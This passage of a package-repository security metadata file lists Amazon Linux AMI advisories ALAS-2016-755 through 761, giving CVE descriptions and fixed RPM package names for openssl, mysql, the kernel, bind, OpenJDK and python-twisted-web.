arch="i686"><filename>Packages/php70-pgsql-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-pspell" version="7.0.11" release="1.16.amzn1" epoch="0" 
arch="i686"><filename>Packages/php70-pspell-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-opcache" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-opcache-7.0.11-1.16.amzn1.i686.rpm</filename></package><package name="php70-debuginfo" version="7.0.11" release="1.16.amzn1" epoch="0" arch="i686"><filename>Packages/php70-debuginfo-7.0.11-1.16.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-755</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-755: medium priority package update for openssl</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6306:
Multiple out of bounds read flaws were found in the way OpenSSL handled certain TLS/SSL protocol handshake messages. A remote attacker could possibly use these flaws to crash a TLS/SSL server or client using OpenSSL.
1377594:
CVE-2016-6306 openssl: certificate message OOB reads
CVE-2016-6302:
An integer underflow flaw leading to a buffer over-read was found in the way OpenSSL parsed TLS session tickets. A remote attacker could use this flaw to crash a TLS server using OpenSSL if it used SHA-512 as HMAC for session tickets.
1369855:
CVE-2016-6302 openssl: Insufficient TLS session ticket HMAC length checks
CVE-2016-2183:
A flaw was found in the way the DES/3DES cipher was used as part of the TLS/SSL protocol. A man-in-the-middle attacker could use this flaw to recover some plaintext data by capturing large amounts of encrypted traffic between a TLS/SSL server and client if the communication used a DES/3DES based ciphersuite.
1369383:
CVE-2016-2183 SSL/TLS: Birthday attack against 64-bit block ciphers (SWEET32)
CVE-2016-2182:
An out of bounds write flaw was discovered in the OpenSSL BN_bn2dec() function. An attacker able to make an application using OpenSSL process a large BIGNUM could cause the application to crash or, possibly, execute arbitrary code.
1367340:
CVE-2016-2182 openssl: Out-of-bounds write caused by unchecked errors in BN_bn2dec()
CVE-2016-2181:
A flaw was found in the Datagram TLS (DTLS) replay protection implementation in OpenSSL. A remote attacker could possibly use this flaw to make a DTLS server using OpenSSL reject further packets sent from a DTLS client over an established DTLS connection.
1369113:
CVE-2016-2181 openssl: DTLS replay protection bypass allows DoS against DTLS connection
CVE-2016-2180:
An out of bounds read flaw was found in the way OpenSSL formatted Public Key Infrastructure Time-Stamp Protocol data for printing. An attacker could possibly cause an application using OpenSSL to crash if it printed time stamp data from the attacker.
1359615:
CVE-2016-2180 OpenSSL: OOB read in TS_OBJ_print_bio()
CVE-2016-2179:
It was discovered that the Datagram TLS (DTLS) implementation could fail to release memory in certain cases. A malicious DTLS client could cause a DTLS server using OpenSSL to consume an excessive amount of memory and, possibly, exit unexpectedly after exhausting all available memory.
1369504:
CVE-2016-2179 openssl: DTLS memory exhaustion DoS when messages are not removed from fragment buffer
CVE-2016-2178:
It was discovered that OpenSSL did not always use constant time operations when computing Digital Signature Algorithm (DSA) signatures. A local attacker could possibly use this flaw to obtain a private DSA key belonging to another user or service running on the same system.
1343400:
CVE-2016-2178 openssl: Non-constant time codepath followed for certain operations in DSA implementation
CVE-2016-2177:
Multiple integer overflow flaws were found in the way OpenSSL performed pointer arithmetic. A remote attacker could possibly use these flaws to cause a TLS/SSL server or client using OpenSSL to crash.
1341705:
CVE-2016-2177 openssl: Possible integer overflow vulnerabilities in codebase
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2177" title="" id="CVE-2016-2177" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2178" title="" id="CVE-2016-2178" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2179" title="" id="CVE-2016-2179" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2180" title="" id="CVE-2016-2180" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2181" title="" id="CVE-2016-2181" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2182" title="" id="CVE-2016-2182" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2183" title="" id="CVE-2016-2183" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6302" title="" id="CVE-2016-6302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6306" title="" id="CVE-2016-6306" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.96.amzn1" epoch="1" 
arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-15.96.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-15.96.amzn1.i686.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="15.96.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-15.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-756</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-756: important priority package update for mysql55 mysql56</title><issued date="2016-10-12 17:00:00" /><updated date="2016-10-12 17:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6662:
It was discovered that the MySQL logging functionality allowed writing to MySQL configuration files. An administrative database user, or a database user with FILE privileges, could possibly use this flaw to run arbitrary commands with root privileges on the system running the database server.
1375198:
CVE-2016-6662 mysql: general_log can write to configuration files, leading to privilege escalation
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662" title="" id="CVE-2016-6662" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql55" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-debuginfo-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-devel-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-devel-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-libs" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-libs-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-server" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-server-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-bench" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-bench-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-test" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-test-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql-config" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql-config-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package name="mysql55-embedded" version="5.5.52" release="1.13.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql55-embedded-5.5.52-1.13.amzn1.x86_64.rpm</filename></package><package 
name="mysql55" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-embedded-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-devel-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-debuginfo" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-debuginfo-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-embedded" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-embedded-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-devel" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-devel-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-test" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-test-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql-config" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql-config-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-libs" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-libs-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-server" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-server-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql55-bench" version="5.5.52" release="1.13.amzn1" epoch="0" arch="i686"><filename>Packages/mysql55-bench-5.5.52-1.13.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-devel-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-common" version="5.6.33" release="1.21.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql56-common-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-embedded-devel-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-errmsg" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-errmsg-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-server" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-server-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-libs" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-libs-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-bench" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-bench-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-debuginfo-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-test" version="5.6.33" release="1.21.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql56-test-5.6.33-1.21.amzn1.x86_64.rpm</filename></package><package name="mysql56-embedded-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-devel-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-server" version="5.6.33" release="1.21.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql56-server-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-test" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-test-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-common" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-common-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-debuginfo" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-debuginfo-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-libs" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-libs-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-devel" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-devel-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-embedded" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-embedded-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-bench" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-bench-5.6.33-1.21.amzn1.i686.rpm</filename></package><package name="mysql56-errmsg" version="5.6.33" release="1.21.amzn1" epoch="0" arch="i686"><filename>Packages/mysql56-errmsg-5.6.33-1.21.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-757</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-757: critical priority package update for kernel</title><issued date="2016-10-20 04:11:00" /><updated date="2016-11-10 18:00:00" 
/><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5195:
CVE-2016-5195 kernel: remove gup_flags FOLL_WRITE games from __get_user_pages()
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5195" title="" id="CVE-2016-5195" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.4.23" release="31.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.4.23" release="31.54.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.4.23-31.54.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.4.23" release="31.54.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.4.23-31.54.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.23" release="31.54.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.4.23-31.54.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-758</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-758: important priority package update for bind</title><issued date="2016-10-20 11:32:00" /><updated date="2016-10-20 20:26:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2848:
CVE-2016-2848 bind:
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2848" title="" id="CVE-2016-2848" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.49.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.49.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-759</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-759: critical priority package update for java-1.8.0-openjdk</title><issued date="2016-10-27 17:00:00" /><updated date="2016-10-27 17:00:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5597:
A flaw was found in the way the Networking component of OpenJDK handled HTTP proxy authentication. A Java application could possibly expose HTTPS server authentication credentials via a plain text network connection to an HTTP proxy if the proxy asked for authentication.
1386103:
CVE-2016-5597 OpenJDK: exposure of server authentication credentials to proxy (Networking, 8160838)
CVE-2016-5582:
It was discovered that the Hotspot component of OpenJDK did not properly check the arguments of the System.arraycopy() function in certain cases. An untrusted Java application or applet could use this flaw to corrupt the virtual machine&#039;s memory and completely bypass Java sandbox restrictions.
1385402:
CVE-2016-5582 OpenJDK: incomplete type checks of System.arraycopy arguments (Hotspot, 8160591)
CVE-2016-5573:
It was discovered that the Hotspot component of OpenJDK did not properly check received Java Debug Wire Protocol (JDWP) packets. An attacker could possibly use this flaw to send debugging commands to a Java program running with debugging enabled if they could make the victim&#039;s browser send HTTP requests to the JDWP port of the debugged application.
1385544:
CVE-2016-5573 OpenJDK: insufficient checks of JDWP packets (Hotspot, 8159519)
CVE-2016-5554:
A flaw was found in the way the JMX component of OpenJDK handled classloaders. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions.
1385714:
CVE-2016-5554 OpenJDK: insufficient classloader consistency checks in ClassLoaderWithRepository (JMX, 8157739)
CVE-2016-5542:
It was discovered that the Libraries component of OpenJDK did not restrict the set of algorithms used for JAR integrity verification. This flaw could allow an attacker to modify the content of a JAR file that used a weak signing key or hash algorithm.
1385723:
CVE-2016-5542 OpenJDK: missing algorithm restrictions for jar verification (Libraries, 8155973)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5542" title="" id="CVE-2016-5542" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5554" title="" id="CVE-2016-5554" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5573" title="" id="CVE-2016-5573" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5582" title="" id="CVE-2016-5582" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5597" title="" id="CVE-2016-5597" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="java-1.8.0-openjdk" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-javadoc" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="noarch"><filename>Packages/java-1.8.0-openjdk-javadoc-1.8.0.111-1.b15.25.amzn1.noarch.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package 
name="java-1.8.0-openjdk-debuginfo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.111-1.b15.25.amzn1.x86_64.rpm</filename></package><package name="java-1.8.0-openjdk-src" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-src-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-devel" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-devel-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-debuginfo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-debuginfo-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-headless" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-headless-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package><package name="java-1.8.0-openjdk-demo" version="1.8.0.111" release="1.b15.25.amzn1" epoch="1" arch="i686"><filename>Packages/java-1.8.0-openjdk-demo-1.8.0.111-1.b15.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-760</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-760: important priority package update for python-twisted-web</title><issued date="2016-10-27 17:00:00" /><updated date="2016-10-27 17:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1000111:
It was discovered that python-twisted-web used the value of the Proxy header from HTTP requests to initialize the HTTP_PROXY environment variable for CGI scripts, which in turn was incorrectly used by certain HTTP client implementations to configure the proxy for outgoing HTTP requests. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
1357345:
CVE-2016-1000111 Python Twisted: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000111" title="" id="CVE-2016-1000111" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-twisted-web-8.2.0-5.5.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-twisted-web-8.2.0-5.5.amzn1.x86_64.rpm</filename></package><package name="python26-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/python26-twisted-web-8.2.0-5.5.amzn1.i686.rpm</filename></package><package name="python27-twisted-web" version="8.2.0" release="5.5.amzn1" epoch="0" arch="i686"><filename>Packages/python27-twisted-web-8.2.0-5.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-761</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-761: important priority package update for memcached</title><issued date="2016-11-10 18:00:00" 